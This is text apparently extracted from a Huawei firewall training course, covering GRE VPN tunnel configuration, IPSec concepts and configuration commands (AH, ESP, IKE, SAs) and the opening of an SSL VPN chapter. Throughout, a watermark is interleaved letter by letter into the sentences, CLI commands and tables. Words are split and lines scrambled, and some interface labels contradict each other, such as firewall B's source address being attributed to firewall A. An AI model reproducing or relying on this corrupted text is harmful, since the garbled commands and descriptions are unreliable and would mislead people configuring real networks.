5.Configure the source address cofe interface Tunnel 1 (IP address of Ethernet 1/0/0 on
r
firewall A).
u
o
s
[A-Tunnel1] source 192.13.2.1
e
R
6.Configure the destination
address of interface Tunnel 1 (IP address of Ethernet
g
n B).
2/0/0 on firewall
i
n
r
[A-Tunnel1]adestination 131.108.5.2
Le
r
Pa ge 17
Copyrig
o
n
e
/
m
o
c (2)
.
i
e
w
a
u
7. Configure a static route to Tunnel 1 and then to Grouph2.
.
g
[A] ip route-static 10.1.3.0 255.255.255.0 tunnel 1 in
n
r
a
8. Enter the Untrust zone view.
e
l
/
/
[A] firewall zone untrust
:
p
t
9. Add Tunnel 1 to the Untrust zone.t
h
: 1
[A-zone-Untrust] add interface Tunnel
s
e
c
r packet filtering rules.
10.Configure default interzone
u
o
s
[A] firewall packet-filter
Re default permit interzone trust local
g
n
[A] firewall packet-filter
default permit interzone untrust local
i
n
r
[A] firewallapacket-filter default permit interzone trust untrust
Le
r
Pa ge 18
Copyrig
o
n
e
/
m
o
c (3)
.
i
e
w
a
The configuration of firewall B is similar to that of firewall
u A. You
h
.
need to change only the source and destination addresses
of the
g
n
i
tunnel and the default route.
n
r
a
1. Configure the IP address of the interface Tunnel
e 1.
l
/
/
[B-Tunnel1] ip address 10.1.3.1 24
:
p
t
2. Configure the source address of interface
Tunnel 1 (IP address of Ethernet
t
h
1/0/0 on firewall A).
:
s
[B-Tunnel1] source 131.108.5.2
e
c
r address of interface Tunnel 1 (IP address of
u
3. Configure the destination
o
s
Ethernet 2/0/0 on
Re firewall B).
[B-Tunnel1] destination
192.13.2.1
g
n
i a static route to Tunnel 1 and then to Group 1.
n
4. Configure
r
a
[B] ip
Leroute-static 10.1.1.0 255.255.255.0 tunnel 1
r
Pa ge 19
Copyrig
o
m
o
Configuration of GRE VPN (Web) i.c
e
w
a
u
h
.
g
n
i
n
r
a
e
l
/
/
:
p
t
t
h
:
s
e
c
r
u
o
s
Re
g
n
i
n
r
a
Le
r
Pa ge 20
Copyrig
o
n
e
/
m
o
Precautions on the Configuration of GRE VPN
c
.
i
e
w
a
u
h
To ensure smooth forwarding of data flows, add the.
g the
physical interface and the tunnel interface creatednon
physical interface into the same security zone.ni
r
a
e
The devices at the two ends of a tunnel/l
can forward GRE
/ are tunnel
encapsulated packets only when there
:
p
forwarded routes on the two devices.
t
ht
: on a tunnel, the verification
To configure key verification
s
ekeywords at both ends are the
succeeds only when the
c
r packet is dropped.
same. Otherwise, the
u
o
s
If checksum iseconfigured, the sender encapsulates the
R
checksum according to the GRE header and payload
g In addition, the packet that contains the
n
information.
i is sent to the peer.
n
checksum
r
a
Le
r
Pa ge 21
Copyrig
o
n
e
/
Summary
n
e
/
.
i
e
m
o
c
w
a
u Generic
Basic principles and implementation modes h
of
.
g
n
Routing Encapsulation (GRE) VPN
i
n
r
a
Security mechanisms of GRE VPN e
l
/
/
:
Application scenarios and configuration
methods of GRE
p
t
ht
VPN
:
s
e
c
r
u
o
s
Re
g
n
i
n
r
a
Le
r
Pa ge 22
Copyrig
o
Questions
n
e
/
.
i
e
m
o
c
w
a
uWhat are the
What are the main application scenarios of GRE VPN?
h
.
drawbacks of GRE VPN?
g
n
i
What security services can GRE VPN provide?rn
a IP addresses of GRE
e
What interfaces do the source and destination
l
/
represent in a real application scenario?
/
:
p end use to trigger the setup
t
What mechanism does the GRE source
t
h
of a tunnel?
:
s
What information does theeGRE destination end use to identify
c
received GRE packets? ur
o
In a GRE applicationes
scenario, how to set interzone filtering to meet
R
the principle of g
minimum authorization?
n
i
n
r
a
e
L
r
Pa ge 23
Copyrig
o
n
e
/
m
o
c
Answer
.
i
e
w
a
u
h
.
g
n
i
n
r
a
le
/
/
p:
:
s
e
c
r
t
t
h
u
o
s
n
r
a
e
r
o
g
n
i
Re
Le
Pa ge 24
n
e
/
m
o
c
.
i
e
w
a
u
h
.
g
n
i
n
r
a
le
Thank :you
//
p
www.huawei.com
t
t
:
s
e
c
r
u
o
s
n
r
a
e
r
o
Le
g
n
i
Re
n
e
/
m
o
c
.
i
e
w
a
u
h
.
g
n
i
n
Chapter 9 IPSec VPNlear

/
/
p:
:
s
e
c
r
t
t
h
u
o
s
n
r
a
g
n
i
Re
e
L
e
r
o
www.huawei.com
Objectives
n
e
/
.
i
e
m
o
c
w
a
u to:
able
.
g
n
Basic principles of IPSec
i
n
r
a
AH and ESP technologies
e
l
/
/
:
Service flow of the IKE protocol
p
t
t
Application scenarios andhconfigurations of IPSec VPN
:
s
e
c
r
u
o
s
Re
g
n
i
n
r
a
Le
r
Pa ge 1
Copyrig
o
n
e
/
m
o
c
Contents
.
i
e
w
a
u
1. IPSec VPN Overview
h
.
g
n
i
n
2. IPSec VPN Architecture
r
a
le
3. AH Technology
/
/
p:
4. ESP Technology
5. IKE Technology
:
s
e
c
r
t
t
h
u
Scenarios
6. IPSec VPN Application
o
s
n
r
a
e
r
o
g
n
i
Re
Le
Pa ge 2
n
e
/
m
o
c
IPSec Overview
.
i
e
w
a
u
IPSec VPN
Anti-replay
e
r
o
Le
n
i
n
Security tunnel
r
a
le
Branch
n
r
a
h
.
g
g
n
i
s
e
R
r
u
o
H.Q.
/
/
:
Confidentiality
p
t
t
h
:
s
ce
IPSec
Integrity
Authentication
Pa ge 3
n
e
/
m
o
c
IPSec Features
APP
Data
APP
Data
r
a
le
IP
/
/
p:
:
s
e
c
r
Branch
w
a
u
h
.
g
TCP/
n
niUDP
TCP/
UDP
Protection areas
.
i
e
Protection areas
IP
t
t
h
IPSec VPN
u
o
s
rn
e
r
o
a
e
L
g
n
i
HQ
Re
Internet services
Pa ge 4
n
e
/
m
o
c
IPSec Protection Scenario
.
i
e
w
a
u
IPSec VPN
h
.
g
n
i
n
r
a
le
Branch
/
/
p:
:
s
e
c
r
IPSec E2E scenario
g
n
i
t
t
h
u
o
s
Re
Between security gateways (such as firewalls)
Between the host and security gateway
Between hosts
e
r
o
n
r
a
H.Q.
Le
Pa ge 5
n
e
/
m
o
c
Contents
.
i
e
w
a
u
h
.
g
n
i
n
r
a
le
3. AH Technology
/
/
p:
4. ESP Technology
5. IKE Technology
:
s
e
c
r
t
t
h
u
Scenarios
o
s
n
r
a
e
r
o
g
n
i
Re
Le
Pa ge 6
n
e
/
m
o
c
IPSec VPN Architecture
.
i
e
w
a
u
h
.
g
IPSec VPN architecture
n
i
n
r
a
le
AH: authentication
header
ESP: encapsulating
security payload
/
/
p:
Encryption algorithm
:
s
e
c
r
t
t
h
Authentication
algorithm
u
o
s Key management
n
r
a
e
r
o
g
n
i
Re
Policy
Le
Pa ge 7
n
e
/
m
o
c
IPSec Protocols
.
i
e
w
a
u
n
i
sources, checking data integrity,
n and anti-replay, but
r
a
AH does not encrypt all theeprotected
packets.
l
/
/
:
p
ESP provides all thet functions of AH and encrypts IP
t
h
packets. However, data integrity of IP headers is not
ESP
:
s
checked. e
c
r
u
o
s
e
R
IPSec enables privacy,
integrity, authenticity and anti-replay of
g
n
i
packets during
n network transmission.
r
a
e
L
r
Pa ge 8
Copyrig
o
AH
h
.
g
AH provides the functions of authenticating data
n
e
/
m
o
c
IPSec Encapsulation Modes

Transpor
t mode
.
i
e
w
a
u
h
.
g
In transport mode, IPSec headers are inserted behind the IP

header and before all transport layer protocols or all other
IPSec protocols.
n
i
n
r
a
e
In
tunnel
mode,
IPSec
headers
are inserted before the
l
Tunnel
/
original IP header. The new
/ packet header is placed before
mode
:
AH or ESP.
p
t
ht
:
s
e IPH
c
Data
Transport
r
u
mode
o
s
e
R
IPH IPSec
Data
Tunnel
g
mode
n
i
n
rNew IPH IPSec Org IPH
Data
a
e
L
r
Pa ge 9
Copyrig
o
n
e
/
m
Comparison Between IPSec Encapsulation
o
c
.
i
Modes
e
w
Transport mode:
Tunnel mode:
Comparison:
1. Security
Original IP
header
New IP
header
IPSec
header
IPSec
header
.
g
n
i
n
IP data
r
a
le
Original
IP header
/
/
p:
a
u
h
Original IP data
t
t
In tunnel mode, the original hIP header information is hidden,
:
therefore ensuring data s
security.
e
c
2. Performance
r
u
In tunnel mode, there
o is one extra IP header. In tunnel mode, more
s
bandwidth areeused than that in transport mode.
R
g
To select an encapsulation
mode, weigh performance against
n
i
security. rn
a
e
L
r
Pa ge 10
Copyrig
o
n
e
/
m
o
Encryption and Authentication Algorithms
c
.
i
e
w
a
u
h
Encryption algorithm
.
g
n
DES (56 bit64 bit)
i
n
r
3DES (3 x 56 bit 64 bit )
a
e
l
AES (128, 192, 256)
/
/
:
p
China encryption algorithm (256)
t
t
h
Authentication algorithm
:
s
e
MD5 (128 bit)
c
r
u
SHA-1 (160 bit)
o
s
Computing complexity is
Re
not inevitably connected to
g
n
encryption strength.
i
n
r
a
e
L
r
Pa ge 11
Copyrig
o
n
e
/
m
o
c
Contents
.
i
e
w
a
u
h
.
g
n
i
n
r
a
le
3. AH Technology
/
/
p:
4. ESP Technology
5. IKE Technology
:
s
e
c
r
t
t
h
u
Scenarios
o
s
n
r
a
e
r
o
g
n
i
Re
Le
Pa ge 13
n
e
/
m
o
c
IPSec Protocol-AH
Providing data source authentication (authenticity), integrity

check,
aw
and anti-replay
.
i
e
Encryption algorithms are not supported.
e
r
o
g
n
ni
r
a
e
l
Payload
size
Next packet header
/
/
:
p
t
t
Security parameter
h index (SPI
:
s
e SN
c
r
u
o
s
Re Authentication data
g
n
i
n
Payload data
r
a
e
L
u
h
.
Reserved
field
Pa ge 14
m
o
c
AH Packet Encapsulation Modes i.

Data hu
IPH
.
g
n
i
n
Transport
mode
IPH
Tunnel
mode
AH
e
w
a
/
/
p:
r
a
le Data
To authenticate all
the unchanged parts
t
t
h
Org
New IPH AH
Data
: IPH
s
e
c
To authenticate
all the unchanged
r
u except the new IP header field
parts
o
s
e
RAH protocol number is 51.
In the IP packet header,
g
n
i To authenticate the entire IP packet
Transport mode:
n
r
a
Tunnelemode: To authenticate the new IP header and the entire IP packet
L
r
Pa ge 15
Copyrig
o
n
e
/
n
e
/
m
o
c
Contents
.
i
e
w
a
u
h
.
g
n
i
n
r
a
le
3. AH Technology
/
/
p:
4. ESP Technology
5. IKE Technology
:
s
e
c
r
t
t
h
u
Scenarios
o
s
n
r
a
e
r
o
g
n
i
Re
Le
Pa ge 16
n
e
/
m
o
c
IPSec Protocol-ESP
.
i
e
w
a
u
Providing data authenticity, data integrity, anti-replay, and data confidentiality
Supporting encryption algorithm
e
r
o
n
i
n
r
a
Security parameter indexSPI
e
l
/
/
:
SN
p
t
t
h
Initialization vector
:
s
e
c
r
Payload
data
u
o
s
e
Next packet
R
Filling size
Filling field
header
g
n
i
n
ar
Le
h
.
g
Authentication data
Pa ge 17
m
o
c
ESP Packet Encapsulating Mode i.

IPH
transport
mode
IPH
Tunnel
mode
New IPH ESPH
Org IPH
e
c
r
u
o
s
s:
Re
g
n
ni ESP Trailer
r
a
e
l
Encryption
/ part
/
Authentication
part
:
p
t
t
h Data
Data
ESPH
e
w
Data
a
u
.h
n
e
/
ESP Auth
ESP Trailer ESP Auth
Encryption part
Authentication part
The protocol number of ESP in the IP packet header is 50.
g
n
i
transport mode: The ESP header is located between the IP packet header and the
transport layer protocol packet header. The ESP tail is added behind the data.
n
r
Tunnel mode:
The ESP packet header is located between the new IP header and
a
e
the initial
L packet. The ESP tail is added behind the data.
r
Pa ge 19
Copyrig
o
n
e
/
m
o
c
Contents
.
i
e
w
a
u
h
.
g
n
i
n
r
a
le
3. AH Technology
/
/
p:
4. ESP Technology
5. IKE Technology
:
s
e
c
r
t
t
h
u
Scenarios
o
s
n
r
a
e
r
o
g
n
i
Re
Le
Pa ge 20
n
e
/
m
o
c
IKE Overview
.
i
e
w
a
u
h
.
g
Oakley
SKEME
ISAKMP
n
r
a
e
r
o
g
n
i
n
i
Free form protocol based on algorithmsrn
a
e
l
/
/
:
p
t
t exchange
h
Defines how to verify
key
:
s
e
c
r
Defines uthe state change process of
o
communication
mode and information
s
e
format
to guarantee communication
R
security
Le
Pa ge 21
IKE
n
e
/
m
o
c
IKE Security Mechanism

DH algorithm,
key distribution
.
i
e
w
a
u
h
.
g
n
i
n
r
a
e
lForward
Identity
protection
/
/
p:
security
t
t
h
Identity
authentication
:
s
e
c
r
u
o
s
e
R
IKE has a self-protection mechanism, which can safely distribute keys,
g
n
authenticate identities,
and set up an IPSec association on an
i
n
r
insecure network.
a
Le
r
Pa ge 23
Copyrig
o
n
e
/
m
o
c
IPSec SA Concept
.
i
e
w
a
u
SA Contents
SA
h
.
g
n
i
SA n is the convention of
r
a
lecommunication peers against
/
/
p:
Security protocols (AH ESP AH+ESP)

Operation mode (transport mode and
tunnel mode)
t
t
h
:
s
Encryption algorithm (DES and 3DES)
e
c
r
u
so and key
Lifecycle of the sharedekey
R
g
n
i
n
r
a
Le
r
Copyrig
o
some elements. An SA can be

established only when both
communication
parties
comply with SA conventions.
SA is uniquely identified by a
triplet, including the SPI,
destination IP address, and
security protocol number.
Pa ge 24
n
e
/
m
o
c
IKE Functions in IPSec
.
i
e
Reduces complexity of manual configuration.
Scheduled SA update.
Scheduled key update.
w
a
u
h
.
g
n
i
n
r
a
le
/
/
Allows IPSec to provide the anti-replay

:
p
t
t
service.
h
:
s
Allows E2E dynamic authentication.

e
c
r
u
o
s
Re
g
n
i
n
r
a
Le
r
Copyrig
o
Pa ge 25
m
o
Relation Between IKE and IPSec i.c
e
w
a
SA negotiation of IKE
u
h
IKE
IKE
.
g
n
i
n
r
a
e
SA
l
/ SA
/
TCP UDP
TCP UDP
:
p
t
t
h
IPSec
IPSec
:
s
e
c IP
r
u
o
s Encrypted IP packet
e
R
g
n
i
n
r
a
Le
r
Pa ge 26
Copyrig
o
n
e
/
n
e
/
m
o
c
IKE Phases of IKE

IKE SA negotiation
IKE
SA
TCP
UDP
TCP
/
/
p:
Encrypted IP Packet
t
t
h
n
i
n
r
a
le
UDP
IPSec
IP
w
a
u
Receive the data

streams to be
protected.
h
.
g
SA
IPSec
IKE
.
i
e
Negotiate about
the IKE SA.
Negotiate about
the IPSec SA.
Provide AH and
ESP protection.
:
s
eabout IPSec keys and establish an SA:
c
IKE uses two phases to negotiate
r parties establish a tunnel that has passed identity
u
First phase: Both communication
o
authentication and hassbeen protected, namely IKE SA. Negotiation modes include
e mode. Authentication modes include pre-shared key,
main mode and aggressive
R
digital signature, and public key encryption.
g the tunnel established in the first phase to negotiate about the
n
Second phase:
Use
i for IPSec and set up an IPSec SA. The IPSec SA is used for the final
security service
n
r
safe transmission
of IP data. The negotiation mode is fast mode.
a
Le
r
Pa ge 27
Copyrig
o
n
e
/
m
Exchange Process of IKE Pre-Shared Key
o
c
.
i
in Main Mode
e
Initiator
w
a Receiver
u
h
Initiator cookie
Mode negotiation
.
g
n
i
n
Responder cookie
Algorithm
r
a
Key exchange
confirmation
e
payload Xa
l
/
Temporary value
/
:
payload Ni
Key exchange
p
DH exchange
t
payload Xb
Nonce exchange
ht
Temporary
:
value payload Nr
s
e
Key generation
c
Key HASH generates
r
the hash payload.
u
o
s
e
Identity
Key HASH generates
R
authentication
hash payload.
g
n
i
n
r
End
a
Le
r
Pa ge 28
Copyrig
o
n
e
/
Negotiation Process of Pre-Shared Keyom

c
.
i
in IKE Aggressive Mode
e
w
a
u
h
Peer 1
Peer. 2
g
n
i
n
r
a
e
l
/
/
Initiator
Receiver
:
p
t
t
h
:
s
e
c
r
u
In aggressive mode, three
o messages in total should be exchanged.
s
e
R
Message 1 exchanges SA payload, key specification and identity information.
g
n
Message 2 adds
i Hash authentication payload on the basis of message 1 contents.
n
r
Messagea3 is the authentication initiated by the responder against the initiator.
Le
e
r
o
Pa ge 30
n
e
/
m
Difference Between Main Mode and
o
c
.
i
Aggressive Mode of IKE
e
w
a
u
Exchanged messages:
h
.
g
n
Main mode: 6; aggressive mode: 3
i
n
r
a
Identity protection:
e
l
/
/ encrypted, which can provide
In main mode, the last two messages are
:
p messages are highly integrated
identity protection. In aggressive mode,
t
t
h
without the identity protection
function.
:
s
e
c
Peer identifier:
r
u
o
s are identified by IP addresses only. In aggressive mode,
In main mode, peers
e
R
peers can begidentified by IP addresses or names.
n
i
n
r
a
e
L
e
r
o
Pa ge 31
n
e
/
m
o
c
Negotiation Process in Fast Mode
.
i
e
Peer 1
Peer 2 aw
u
h
.
g
n
i
n
r
aReceiver
e
Initiator
l
/
/
:
p
t
ht
:
s
e
c
r three messages in total.
Fast mode requires exchanging
u
o
s
In messages 1 and 2,eSA, key, Nonce, and ID are exchanged for algorithm
R
negotiation, PFSgguarantee and provisioning of on-site evidence.
n
i
Message 3 is
n used to verify whether responders can communicate, equivalent to
r
a
an acknowledgment
message.
e
L
r
Pa ge 32
Copyrig
o
n
e
/
m
o
c
Key Protection
Key lifecycle
h
.
g
w
a
u
n
i
The key has its lifecycle. When the lifecycle expires, annew key replaces the
r
a
original one.
e
l
/
/
:
p
Perfect forward secrecy (PFS) tt
h
Defines that two keys do not have relationship
with each other.
:
s
e
c
r
u
o
Diffie-Hellman (DH)sgroup
e
R
In the public key encryption system, the information on shared key generation
g
n
process is exchanged
on a public communication channel (Internet) without
i
n
r
protection.
a
Le
r
Pa ge 34
Copyrig
o
.
i
e
n
e
/
m
o
c
IPSec Flow Processing
.
i
e
w
a
u
h
.
g
Inbound
Inbound
n
i
n
r
a
le
Branch
Outbound
t
t
h
/
/
p:
:
s
e
c
Inbound and outbound
r
u
o
s
Discarding packets
Re
ng security service
Bypassingithe
n
r
a the security service
Applying
e
L
r
Copyrig
o
Outbound
Pa ge 36
H.Q.
n
e
/
m
o
c
Contents
.
i
e
w
a
u
h
.
g
n
i
n
r
a
le
3. AH Technology
/
/
p:
4. ESP Technology
5. IKE Technology
:
s
e
c
r
t
t
h
u
Scenarios
o
s
n
r
a
e
r
o
g
n
i
Re
Le
Pa ge 37
n
e
/
m
o
c
Networking Requirements
.
i
e
USG A
USG B
h
.
g
Eth 0/0/0
202.39.160.1/16
Eth 0/0/0
202.39.169.1/16
n
i
n Eth 0/0/1
r192.168.1.1/24
a
le
Eth 0/0/1
192.168.0.1/24
/
/
p:
Host 1
192.168.0.2/24
Networking requirements
w
a
u
:
s
e
c
r
t
t
h
Host 2
192.168.1.2/24
u
o
s
PC1 safely communicates with PC2 and uses IKE between the FWA and FWB for negotiating
Re
about secure channel establishment.
g
n
i
Set the IKE recommendation with SN of 10 on both the FWA and FWB.
Set the authenticator for the authentication that uses the pre-shared key.
Both FWA and FWB are fixed public network addresses.
n
r
a
e
r
o
Le
Pa ge 38
IPSec VPN Configuration Idea
n
e
/
m
o
c
.
i
e
w
a
u
h
.
g
Start
n
i
n
Configure IPSec policy
r
a
le Reference IPSec on
Basic configuration (such as setting

the IP addresses of interfaces)
Configure IPSec proposal
Configure IKE
proposal
g
n
i
:
s
e
c
r
/
/
p:
t
t
h
u
o
s
Re
Configure IKE peer
n
r
a
e
r
o
interfaces
Enable filter rules of the
corresponding zones
Configure the route to
the peer intranet
segment
End
Le
Pa ge 39
n
e
/
IPSec Configuration Process IPSec om

c
.
i
Proposal
e
w
a
u proposal and
Run the ipsec proposal proposal-name command to create a security
h
.
enter the security proposal view.
g
n
i
Run the transform { ah | ah-esp | esp } command to selectna security protocol. By
r
a
default, esp is used.
e
l
Run the encapsulation-mode tunnel command to//
select the packet encapsulation
:
p
mode.
t
t
h | sha1 } command to set the
Run the ah authentication-algorithm { md5
:AH protocol. By default, MD5 algorithm is used
s
authentication algorithm used by the
e
c
by the AH protocol as the IPSecr security proposal says.
u
o
Run the esp authentication-algorithm
{ md5 | sha1 } command to set the
s
e
R used by the ESP protocol. By default, MD5 algorithm is used.
authentication algorithm
g
n
Run the esp encryption-algorithm
{ 3des | des | aes | scb2} command to set the
i
n used by the ESP protocol. By default, DES algorithm is used.
r
encryption algorithm
a
e
L
e
r
o
Pa ge 40
n
e
/
IPSec Configuration Process IKE om

c
.
i
Proposal
e
w enter the IKE
Run the ike proposal proposal-number command to create and
a
u
security proposal view.
h
.
g
Run the authentication-method pre-share command to
n set the
i
authentication method.
n
r
a } command to select an
Run the encryption-algorithm { des-cbc | 3des-cbc
e
l
/
encryption algorithm. By default, 56-bit DES
algorithm
in CBC mode is used.
/
:
p
If pre-shared key authentication method
t is selected, set the pret
h pre-shared keys on two peer ends
shared key for each peer end. The
: must be the same.
that establish a secure connection
s
e
c
Run the authentication-algorithm
r { md5 | sha } command to select an
u
o By default, SHA1 algorithm is used.
authentication algorithm.
s
e
Run the dh { group1 R| group2 | group5} command to select the Diffieg
Hellman group identifier.
By default, the identifier is group1, namely, 768n
i
bit Diffie-Hellman
n group.
r
aduration interval command to set the SA lifecycle.
Run the sa
e
L
e
r
o
Pa ge 41
n
e
/

c
.
i
Peer
Run the ike peer peer-name command to create an IKE peer and enter e
the IKE peer
w
view.
a
u the negotiation
h
Run the exchange-mode { main | aggressive } command to configure
.
mode.
g
n
i
n end name can be set.
In aggressive mode, the peer IP address and peer
r
easet. By default, main mode
In main mode, only the peer IP address canlbe
/
is used for IKE negotiation.
/
:
p
t
t
Run the ike-proposal proposal-number command
to set the IKE security proposal.
h
Run the local-id-type { ip | name } command
to set the ID type (optional) of the IKE
:
s
peer.
e
c
Run the pre-shared-key key-string
command to set the pre-shared key shared with
r
u
the peer end.
o
s
Run the local-address ip-address
command to set the local IP address used for IKE
e
R
negotiation.
g low-ip-address [ high-ip-address ] command to set the peer IP
Run the remote-address
n
i
address.
n
r
Run the remote-name
name command to set the peer end name. (In aggressive mode,
a
e
when name
L is used for authentication.)
e
r
o
Pa ge 42
n
e
/

c
.
i
Peer (Continued)
e
w
a
Run the ipsec sa global-duration { time-based interval
| trafficu
h
.
lifecycle
based kilobytes } command to set the global SA
g
n
(optional).
i
n
r
Run the ike local-name router-name command
to set the local
a
e
l
ID (optional) for IKE negotiation.
/
/
:
Run the ike sa keepalive-timer interval
interval command to set
p
t
the interval (optional) at which
ht Keepalive packet is sent.
: timeout interval command to
Run the ike sa keepalive-timer
s
e
set the expiration timec(optional)
of waiting for Keepalive
r
u
packet.
o
s
e
Run the ike sa nat-keepalive-timer
interval interval command
R
to set the time
g interval (optional) at which the NAT update
n
i
packet isnsent.
r
a
Le
e
r
o
Pa ge 43
n
e
/
IPSec Configuration Process IPSec om

c
.
Security Policy and Application ei
w
a
u
Create an ACL to define the protected data streams.
h
.
g
Run the ipsec policy policy-name seq-number isakmp command
to create a
n
i
security policy.
n
r
a to reference a security
Run the proposal proposal-name&<1-6> command
e
l
proposal in the security policy template. //
: | time-based interval } command
p
Run the sa duration { traffic-based kilobytes
t
t
to set the SA lifecycle (optional).
h
: to reference the IKE peer.
Run the ike-peer peer-name command
s
e command to set the ACL referenced by the
c
Run the security acl acl-number
r
u
security policy.
o
s
Run the interface interface-type
interface-number command to enter the
Re
interface view. Here,
g select the network egress.
n
i policy-name command to reference the security policy.
Run the ipsec npolicy
r
a
Le
e
r
o
Pa ge 44
n
e
/
m
o
c
IPSec VPN Configuration Wizard i.(Web)
e
w
a
u
h
.
g
n
i
n
r
a
e
l
/
/
:
p
t
t
h
:
s
e
c
r
u
o
s
Re
g
n
i
n
r
a
Le
r
Pa ge 45
Copyrig
o
n
e
/
m
o
c
IPSec Result Verification and

Maintenance Commands
.
i
e
w
a
u
PC1 and PC2 can access each other.
Two bi-directional IPSec SAs can be shown

in on the firewall.
n
r
a
e
l
/
/
p:
<FWA>display ipsec sa brief
current ipsec sa number: 2
h
.
g
t
t
h
:
s
e
c
rSPI VPN Protocol Algorithm
--------------------------------------------------------------
u
o
------------------------------------------------------------------s
e
R
202.39.160.1 202.39.169.1
957073432 0 ESP
E:DES;A:HMAC-MD5-96;
g
n
202.39.169.1 202.39.160.1
2838744079 0 ESP
E:DES;A:HMAC-MD5-96;
i
n
r
a
e
L
r
Pa ge 46
Copyrig
o
Src Address
Dst Address
IPSec Result Verification and

Maintenance Commands
n
e
/
w
a
u
IKE peer and IKE SA information can be shown.
h
.
g
n
i
n
r
a
e
<USG B> dis ike sa
l
/
/
:
p
t
connection-id peer
flag
phase
ht doi
:
----------------------------------------------------------------------s
e
c
r
2
202.39.160.1 RD|ST
1 IPSEC
u
o RD|ST 2 IPSEC
s
4
202.39.160.1
Re
g
n
i
n
r
a
Le
r
Pa ge 47
Copyrig
o
.
i
e
m
o
c
n
e
/
m
o
c
Notices About IPSec VPN Configuration
.
i
e
w
a
u
h
.
On the firewall, there must be a proper route to the peer intranet
g
n
segment.
i
n
r
a
e
l
/
Disable the fast forwarding function of the/USG2100 interface that
:
is connected to the intranet .
p
t
t
h
: ACL that actively triggers
Define the Source field in thesfirewall
e ACLs of both parties to be mutual
IPSec VPN. Recommend setting
c
mirroring.
r
u
o
s
Re packet filter rule between Local and Untrust
Setting the default
zones aimsg to allow devices on two ends of the IPSec tunnel to
n so that they can negotiate about the SA.
communicate
i
n
r
a
e
L
r
Pa ge 48
Copyrig
o
n
e
/
m
o
c
Summary
Basic principles of IPSec
AH and ESP technologies

Service flow of the IKE protocol
.
i
e
w
a
u
h
.
g
r
a
le
n
i
n
/
/
:
p
of IPSec VPN
t
ht
:
s
e
c
r
u
o
s
Re
g
n
i
n
r
a
Le
r
Pa ge 49
Copyrig
o
n
e
/
m
o
c
Questions
w
a
u
.
i
e
Which security services do the IPSec VPN provide? What are the meanings and
implementation mode of each security service?
h
.
What are two major security protocols of IPSec? What is the difference
between them?
g
n
i is the difference between
What are two major encapsulation modes of IPSec? What
n
r
their application scenarios ?
a
e
Which four security mechanisms can be provided l
by the IKE? What is the function of
/
/
each security mechanism?
:
p
What is the function of SAs in the IPSec? t
Which triplet is the unique identifier of the
t
SA?
h
: in the first phase? What are their scenarios?
What are two negotiation modes ofsIKE
e options of two IKE negotiation modes in the
c
What is the difference of configuration
r
u
first phase?
o
s
Which technology is usede by IPSec to trigger the establishment of an IPSec tunnel?
R
In tunnel mode, howg to set a private network route?
n scenarios, how to set the interzone packet filter to meet the
i
In IPSec application
n requirements? Give analysis from the perspective of service flow
r
minimum rights
a
direction.Le
r
Pa ge 50
Copyrig
o
n
e
/
m
o
c
Answer
.
i
e
w
a
u
h
.
g
n
i
n
r
a
le
/
/
p:
:
s
e
c
r
t
t
h
u
o
s
n
r
a
e
r
o
g
n
i
Re
Le
Pa ge 51
n
e
/
m
o
c
.
i
e
w
a
u
h
.
g
n
i
n
r
a
le
Thank :you
//
p
www.huawei.com
t
t
:
s
e
c
r
u
o
s
n
r
a
e
r
o
Le
g
n
i
Re
n
e
/
m
o
c
.
i
e
w
a
u
h
.
g
n
i
n
Chapter 10 SSL VPN lear

/
/
p:
:
s
e
c
r
t
t
h
u
o
s
n
r
a
g
n
i
Re
e
L
e
r
o
www.huawei.com
Objectives
n
e
/
.
i
e
w
a
u to:
able
.
g
n
SSL VPN technology
i
n
r
Basic functions and features of thelSVN3000
ea
/
/
: VPN
Methods for configuring the SSL
p
t
t
h
:
s
e
c
r
u
o
s
Re
g
n
i
n
r
a
Le
r
Pa ge 1
Copyrig
o
m
o
c
n
e
/
m
o
c
Contents
.
i
e
w
a
u
1. SSL VPN Overview
h
.
g
n
i
n
2. SSL VPN Technology
r
a
le
3. SSL VPN Security Policy
/
/
p:
4. SSL VPN Application Scenario

tt
:
s
e
c
r
u
o
s
n
r
a
e
r
o
g
n
i
Re
Le
Pa ge 2
n
e
/
m
o
c
SSL Overview
.
i
e
Secure
g.
Not Secure
n
i
n
/
/
p:
TCP
g
n
i
r
a
le HTTP
HTTP
IP
w
a
u
:
s
e
c
r
t
t
h
u
o
s
Re
SSL
TCP
IP
nPosition of the SSL in the TCP/IP protocol stack

r
a
e
r
o
Le
Pa ge 3
n
e
/
m
o
c
Security Comparison Between SSL and IPSec
.
i
e
w
a
u
.h
SSL VPN
IPSec g
VPN
n
i
n
r
aAPP+Data
HTTP
e
l
/
/
:
p
TCP
SSL
t
t
h
:
s
IP
e
TCP
c
r
u
o
s
IPSec
IP
e
R
g
n
i
IP
n
r
a
Le
r
Pa ge 5
Copyrig
o
n
e
/
m
o
c
SSL VPN Security Technology
.
i
e
w
a
u
The SSL ensures data security from the following

.h aspects:
g
n
ni
Identity authentication
r client and the server

Before setting up an SSL connection, the
a
e
l
should perform authentication using/a digital certificate. The
/
authentication can be unilateralp:from the client to the server
or bidirectional between the client
tt and the server.
h
:
s
e
c
The encryption algorithm
r can be used to encrypt the
u
transmitted data. so
e
R
Integrity
g
n
i
The data discrimination
algorithm can be used to check
n
r
data iseamodified during transmission.
L
r
Pa ge 6
Copyrig
o
Confidentiality
whether
n
e
/
m
o
c
Contents
.
i
e
w
a
u
1. SSL VPN Overview
h
.
g
n
i
n
r
a
le
/
/
p:

tt
:
s
e
c
r
u
o
s
n
r
a
e
r
o
g
n
i
Re
Le
Pa ge 7
n
e
/
m
o
c
SSL Protocol Structure
.
i
e
w
a
u
Application layer protocol
n
i
n
SSL change cipher ar

e
spec protocol/l
SSL handshake
protocol
/
:
p
n
r
a
e
r
o
s
e
R
SSL alert protocol
t
t
SSL record
h protocol
:
s
e
c
r
ou
g
n
i
h
.
g
TCP
IP
Le
Pa ge 8
n
e
/
SSL Bottom Layer SSL Record om

c
.
i
Protocol
e
w
.
g
n
i
n
Application data
Segment
a
u
h
r
a
le
/
/
:
Compress
p
t
t
hMAC address
Add
:
s
e
c
r Encrypt
u
o
s
n
r
a
g
n
i
SSL Record packet

structure
e
r
o
Le
Re
Add the SSL Record

packet header
SSL Record operation

process
Pa ge 9
SSL Upper Layer Protocols
n
e
/
.
i
e
m
o
c
w
a
u
The SSL protocol is implemented using three helements:
.
g
n
Handshake protocol
i
n structure
SSL protocol
r
a
e
Record protocol
l
/
/
:
p
Alert protocol
t
ht
:
s
e
c
r
u
o
s
Re
g
n
i
n
r
a
Le
r
Pa ge 10
Copyrig
o
